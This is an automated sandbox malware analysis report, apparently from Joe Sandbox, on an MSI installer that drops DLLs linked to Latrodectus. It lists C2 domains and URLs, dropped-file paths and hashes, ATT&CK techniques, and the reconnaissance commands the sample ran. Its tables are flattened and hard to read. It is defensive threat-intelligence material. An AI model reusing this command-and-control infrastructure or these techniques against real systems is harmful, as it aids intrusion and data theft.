                      Source: Yara matchFile source: 7.2.rundll32.exe.24739a40000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.24739a40000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.210fea00000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.3239594516.000002473B520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3239003691.0000005536378000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2009341046.00000210FE9F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.2918615287.000002473B890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2009386305.00000210FEA00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3239304282.0000024739A40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.3072398215.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.3001961858.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.2854188056.000002473B4C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1996565614.000001FB3AB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3239248195.0000024739A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2624, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Valid Accounts                      		121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      Exploitation for Privilege Escalation                      		1
                      Deobfuscate/Decode Files or Information                      		OS Credential Dumping2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomains1
                      Replication Through Removable Media                      		2
                      Native API                      		1
                      Valid Accounts                      		1
                      DLL Side-Loading                      		2
                      Obfuscated Files or Information                      		LSASS Memory11
                      Peripheral Device Discovery                      		Remote Desktop ProtocolData from Removable Media21
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job                      		1
                      Windows Service                      		1
                      Valid Accounts                      		1
                      DLL Side-Loading                      		Security Account Manager1
                      Account Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Service Execution                      		1
                      Scheduled Task/Job                      		11
                      Access Token Manipulation                      		1
                      File Deletion                      		NTDS1
                      File and Directory Discovery                      		Distributed Component Object ModelInput Capture113
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                      Windows Service                      		121
                      Masquerading                      		LSA Secrets47
                      System Information Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts112
                      Process Injection                      		1
                      Valid Accounts                      		Cached Domain Credentials471
                      Security Software Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                      Scheduled Task/Job                      		12
                      Virtualization/Sandbox Evasion                      		DCSync12
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                      Access Token Manipulation                      		Proc Filesystem3
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                      Process Injection                      		/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Rundll32                      		Network Sniffing1
                      System Owner/User Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                      Remote System Discovery                      		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging21
                      System Network Configuration Discovery                      		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431940 Sample: ad.msi Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 78 jarinamaers.shop 2->78 80 grizmotras.com 2->80 86 Found malware configuration 2->86 88 Multi AV Scanner detection for dropped file 2->88 90 Multi AV Scanner detection for submitted file 2->90 92 4 other signatures 2->92 10 rundll32.exe 2 2->10         started        14 msiexec.exe 9 2->14         started        16 msiexec.exe 15 38 2->16         started        18 rundll32.exe 2->18         started        signatures3 process4 file5 60 C:\Users\user\AppData\...\Update_77697333.dll, PE32+ 10->60 dropped 62 :wtfbbq (copy), PE32+ 10->62 dropped 96 Contains functionality to compare user and computer (likely to detect sandboxes) 10->96 98 Contains functionality to detect sleep reduction / modifications 10->98 20 rundll32.exe 13 10->20         started        64 C:\Users\user\AppData\Local\...\MSID529.tmp, PE32 14->64 dropped 66 C:\Users\user\AppData\Local\...\MSID509.tmp, PE32 14->66 dropped 76 4 other malicious files 14->76 dropped 68 C:\Windows\Installer\MSID8B1.tmp, PE32 16->68 dropped 70 C:\Windows\Installer\MSID719.tmp, PE32 16->70 dropped 72 C:\Windows\Installer\MSID69B.tmp, PE32 16->72 dropped 74 C:\Users\user\AppData\Local\...\360total.dll, PE32+ 16->74 dropped 100 Drops executables to the windows directory (C:\Windows) and starts them 16->100 24 MSID8B1.tmp 16->24         started        26 msiexec.exe 16->26         started        28 msiexec.exe 16->28         started        signatures6 process7 dnsIp8 82 jarinamaers.shop 104.21.46.75, 443, 49714, 49715 CLOUDFLARENETUS United States 20->82 84 grizmotras.com 172.67.219.28, 443, 49718, 49719 CLOUDFLARENETUS United States 20->84 94 System process connects to network (likely due to code injection or exploit) 20->94 30 cmd.exe 1 20->30         started        33 cmd.exe 1 20->33         started        35 cmd.exe 1 20->35         started        37 2 other processes 20->37 signatures9 process10 signatures11 104 Uses ipconfig to lookup or modify the Windows network settings 30->104 106 Performs a network lookup / discovery via net view 30->106 39 conhost.exe 30->39         started        41 ipconfig.exe 1 30->41         started        43 systeminfo.exe 2 1 33->43         started        46 conhost.exe 33->46         started        48 conhost.exe 35->48         started        50 net.exe 1 35->50         started        52 conhost.exe 37->52         started        54 conhost.exe 37->54         started        56 2 other processes 37->56 process12 signatures13 102 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 43->102 58 WmiPrvSE.exe 43->58         started        process14

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      ad.msi8%ReversingLabs
                      ad.msi8%VirustotalBrowse

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      :wtfbbq (copy)5%ReversingLabs
                      :wtfbbq (copy)14%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\MSID3EB.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSID3EB.tmp0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\MSID498.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSID498.tmp0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\MSID4B9.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSID4B9.tmp0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\MSID4D9.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSID4D9.tmp0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\MSID509.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSID509.tmp0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\MSID529.tmp0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\MSID529.tmp0%VirustotalBrowse
                      C:\Users\user\AppData\Local\sharepoint\360total.dll5%ReversingLabs
                      C:\Users\user\AppData\Local\sharepoint\360total.dll14%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll5%ReversingLabs
                      C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll14%VirustotalBrowse
                      C:\Windows\Installer\MSID69B.tmp0%ReversingLabs
                      C:\Windows\Installer\MSID69B.tmp0%VirustotalBrowse
                      C:\Windows\Installer\MSID719.tmp0%ReversingLabs
                      C:\Windows\Installer\MSID719.tmp0%VirustotalBrowse
                      C:\Windows\Installer\MSID8B1.tmp0%ReversingLabs
                      C:\Windows\Installer\MSID8B1.tmp0%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      jarinamaers.shop1%VirustotalBrowse
                      grizmotras.com1%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      ftp://ftp%2desktop.ini0%Avira URL Cloudsafe
                      https://grizmotras.com/vider0%Avira URL Cloudsafe
                      https://jarinamaers.shop/10%Avira URL Cloudsafe
                      https://grizmotras.com/videri0%Avira URL Cloudsafe
                      https://jarinamaers.shop/live/l0%Avira URL Cloudsafe
                      https://grizmotras.com/0%Avira URL Cloudsafe
                      https://wrankaget.site/live/0%Avira URL Cloudsafe
                      https://jarinamaers.shop/G0%Avira URL Cloudsafe
                      https://jarinamaers.shop/live/l1%VirustotalBrowse
                      https://pewwhranet.com/live/0%Avira URL Cloudsafe
                      https://wrankaget.site/live/2%VirustotalBrowse
                      https://jarinamaers.shop/0%Avira URL Cloudsafe
                      https://grizmotras.com/live/0%Avira URL Cloudsafe
                      https://jarinamaers.shop/11%VirustotalBrowse
                      https://grizmotras.com/live/p0%Avira URL Cloudsafe
                      https://grizmotras.com/1%VirustotalBrowse
                      https://jarinamaers.shop/Y0%Avira URL Cloudsafe
                      https://grizmotras.com/live/xe0%Avira URL Cloudsafe
                      https://jarinamaers.shop/0%VirustotalBrowse
                      https://jarinamaers.shop/live/0%Avira URL Cloudsafe
                      https://jarinamaers.shop/live/K0%Avira URL Cloudsafe
                      https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin0%Avira URL Cloudsafe
                      https://grizmotras.com/live/0%VirustotalBrowse
                      https://jarinamaers.shop/live/1%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      jarinamaers.shop
                      		104.21.46.75
                      		truetrueunknown
                      grizmotras.com
                      		172.67.219.28
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://wrankaget.site/live/true
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://grizmotras.com/live/true
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://jarinamaers.shop/live/true
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://jarinamaers.shop/1rundll32.exe, 00000007.00000003.3199082000.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://grizmotras.com/viderirundll32.exe, 00000007.00000003.3199082000.0000024739B56000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://grizmotras.com/viderrundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://pconf.f.360.cn/safe_update.phprundll32.exefalse
                        		high
                        https://jarinamaers.shop/live/lrundll32.exe, 00000007.00000003.3199082000.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        ftp://ftp%2desktop.inirundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.drfalse
                        • Avira URL Cloud: safe
                        		low
                        https://grizmotras.com/rundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://jarinamaers.shop/Grundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://pewwhranet.com/live/rundll32.exe, 00000007.00000003.3137465440.000002473BA70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137449195.000002473BAB0000.00000040.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://jarinamaers.shop/rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmptrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pscan.f.360.cn/safe_update.phprundll32.exefalse
                          		high
                          http://dr.f.360.cn/scanlistrundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.drfalse
                            		high
                            https://www.thawte.com/cps0/ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drfalse
                              		high
                              https://grizmotras.com/live/prundll32.exe, 00000007.00000003.3199082000.0000024739B27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3239328472.0000024739B23000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://jarinamaers.shop/Yrundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clierundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.drfalse
                                		high
                                https://www.thawte.com/repository0Wad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drfalse
                                  		high
                                  https://grizmotras.com/live/xerundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://sconf.f.360.cn/client_security_confrundll32.exefalse
                                    		high
                                    https://jarinamaers.shop/live/Krundll32.exe, 00000007.00000003.3199082000.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://dr.f.360.cn/scanrundll32.exefalse
                                      		high
                                      https://www.advancedinstaller.comad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drfalse
                                        		high
                                        https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.binrundll32.exe, 00000007.00000003.3137465440.000002473BA70000.00000040.00001000.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        104.21.46.75
                                        		jarinamaers.shopUnited States
                                        		13335CLOUDFLARENETUStrue
                                        172.67.219.28
                                        		grizmotras.comUnited States
                                        		13335CLOUDFLARENETUStrue

                                        General Information

                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1431940
                                        Start date and time:2024-04-26 02:46:03 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 7m 23s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:28
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:ad.msi
                                        Detection:MAL
                                        Classification:mal100.spre.troj.evad.winMSI@38/31@2/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 99%
                                        • Number of executed functions: 40
                                        • Number of non-executed functions: 328
                                        Cookbook Comments:
                                        • Found application associated with file extension: .msi

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        02:47:24API Interceptor5593916x Sleep call for process: rundll32.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        172.67.219.28360total.dll.dllGet hashmaliciousLatrodectusBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          jarinamaers.shopDocument_a19_79b555791-28h97348k5477-3219g9.jsGet hashmaliciousLatrodectusBrowse
                                          • 172.67.136.103
                                          360total.dll.dllGet hashmaliciousLatrodectusBrowse
                                          • 172.67.136.103
                                          grizmotras.comDocument_a19_79b555791-28h97348k5477-3219g9.jsGet hashmaliciousLatrodectusBrowse
                                          • 104.21.59.82
                                          360total.dll.dllGet hashmaliciousLatrodectusBrowse
                                          • 172.67.219.28
                                          Util.dllGet hashmaliciousBazar Loader, LatrodectusBrowse
                                          • 104.21.59.82

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          CLOUDFLARENETUShttps://ndw5xvotehflt.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                          • 104.21.53.38
                                          https://cnmxukx5efilc7lvlel.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                          • 172.66.44.161
                                          https://m7qfa5ng4lp7.blob.core.windows.net/m7qfa5ng4lp7/1.html?4rKpnF7821CfLO43wsacrvmomp962ETPJQJTKIDNZNNV65316UFUY14332V14#14/43-7821/962-65316-14332Get hashmaliciousPhisherBrowse
                                          • 104.18.26.50
                                          https://bocmyw606y.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                          • 172.66.44.172
                                          https://uporniacomnuvidx.z13.web.core.windows.net/index.htmlGet hashmaliciousTechSupportScamBrowse
                                          • 104.17.25.14
                                          https://markssmith.icu/23d80j2d/qwd13d8jqd/index.html?13813e8=0101%2048076%2044139&13813e8=https://playgames5.netGet hashmaliciousTechSupportScamBrowse
                                          • 104.21.12.42
                                          https://tron2qk6vdl.z13.web.core.windows.net/Wind0s01Ersys44/index.htmlGet hashmaliciousTechSupportScamBrowse
                                          • 104.21.53.38
                                          https://aulixalrrydrea.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                          • 172.66.47.90
                                          https://purexxfilmsjoybear.z13.web.core.windows.net/index.htmlGet hashmaliciousTechSupportScamBrowse
                                          • 104.18.11.207
                                          https://pub-9af459faa3e54a63ae5d1f2be8790ad0.r2.dev/get-authenticated.htmlGet hashmaliciousUnknownBrowse
                                          • 104.16.123.96
                                          CLOUDFLARENETUShttps://ndw5xvotehflt.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                          • 104.21.53.38
                                          https://cnmxukx5efilc7lvlel.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                          • 172.66.44.161
                                          https://m7qfa5ng4lp7.blob.core.windows.net/m7qfa5ng4lp7/1.html?4rKpnF7821CfLO43wsacrvmomp962ETPJQJTKIDNZNNV65316UFUY14332V14#14/43-7821/962-65316-14332Get hashmaliciousPhisherBrowse
                                          • 104.18.26.50
                                          https://bocmyw606y.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                          • 172.66.44.172
                                          https://uporniacomnuvidx.z13.web.core.windows.net/index.htmlGet hashmaliciousTechSupportScamBrowse
                                          • 104.17.25.14
                                          https://markssmith.icu/23d80j2d/qwd13d8jqd/index.html?13813e8=0101%2048076%2044139&13813e8=https://playgames5.netGet hashmaliciousTechSupportScamBrowse
                                          • 104.21.12.42
                                          https://tron2qk6vdl.z13.web.core.windows.net/Wind0s01Ersys44/index.htmlGet hashmaliciousTechSupportScamBrowse
                                          • 104.21.53.38
                                          https://aulixalrrydrea.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                          • 172.66.47.90
                                          https://purexxfilmsjoybear.z13.web.core.windows.net/index.htmlGet hashmaliciousTechSupportScamBrowse
                                          • 104.18.11.207
                                          https://pub-9af459faa3e54a63ae5d1f2be8790ad0.r2.dev/get-authenticated.htmlGet hashmaliciousUnknownBrowse
                                          • 104.16.123.96

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          37f463bf4616ecd445d4a1937da06e19Document_a19_79b555791-28h97348k5477-3219g9.jsGet hashmaliciousLatrodectusBrowse
                                          • 104.21.46.75
                                          • 172.67.219.28
                                          360total.dll.dllGet hashmaliciousLatrodectusBrowse
                                          • 104.21.46.75
                                          • 172.67.219.28
                                          SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.32374.20351.xlsxGet hashmaliciousUnknownBrowse
                                          • 104.21.46.75
                                          • 172.67.219.28
                                          SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 104.21.46.75
                                          • 172.67.219.28
                                          ProconGO1121082800.LnK.lnkGet hashmaliciousUnknownBrowse
                                          • 104.21.46.75
                                          • 172.67.219.28
                                          file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                          • 104.21.46.75
                                          • 172.67.219.28
                                          Version.125.7599.75.jsGet hashmaliciousSocGholishBrowse
                                          • 104.21.46.75
                                          • 172.67.219.28
                                          Database4.exeGet hashmaliciousUnknownBrowse
                                          • 104.21.46.75
                                          • 172.67.219.28
                                          lzShU2RYJa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                          • 104.21.46.75
                                          • 172.67.219.28

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Users\user\AppData\Local\Temp\MSID3EB.tmpDocument_a19_79b555791-28h97348k5477-3219g9.jsGet hashmaliciousLatrodectusBrowse
                                            avp.msiGet hashmaliciousUnknownBrowse
                                              Cheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                                Cheat Lab 2.7.2.msiGet hashmaliciousUnknownBrowse
                                                  payload.jsGet hashmaliciousUnknownBrowse
                                                    payload.jsGet hashmaliciousUnknownBrowse
                                                      Doc_m42_81h118103-88o62135w8623-1999q9.jsGet hashmaliciousUnknownBrowse
                                                        avp.msiGet hashmaliciousUnknownBrowse
                                                          sharepoint.msiGet hashmaliciousUnknownBrowse
                                                            :wtfbbq (copy)Document_a19_79b555791-28h97348k5477-3219g9.jsGet hashmaliciousLatrodectusBrowse
                                                              360total.dll.dllGet hashmaliciousLatrodectusBrowse

                                                                Created / dropped Files

                                                                :wtfbbq (copy)

                                                                Download File
                                                                Process:C:\Windows\System32\rundll32.exe
                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):906752
                                                                Entropy (8bit):6.2833336520446625
                                                                Encrypted:false
                                                                SSDEEP:12288:gfPSAAUHV4fZUv/TrguVTax7hNRu18VA8JFoxMk/wYeDKDMyAmp:qPSAAUHV4fZUvfgmaxpu1F8J6xMYHMBS
                                                                MD5:74143402C40AC2E61E9F040A2D7E2D00
                                                                SHA1:4053DC85BB86C47C63F96681D6A62C21CD6342A3
                                                                SHA-256:1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
                                                                SHA-512:4AA55B859F15BE8B14C4A0FF6F3971F49B47C1C8C8427F179EB4AB0C76E321441ADFD173469FACB12AAE1E81E25F1328FD621214B42E66F690BA4E9EE1E54CF9
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                • Antivirus: Virustotal, Detection: 14%, Browse
                                                                Joe Sandbox View:
                                                                • Filename: Document_a19_79b555791-28h97348k5477-3219g9.js, Detection: malicious, Browse
                                                                • Filename: 360total.dll.dll, Detection: malicious, Browse
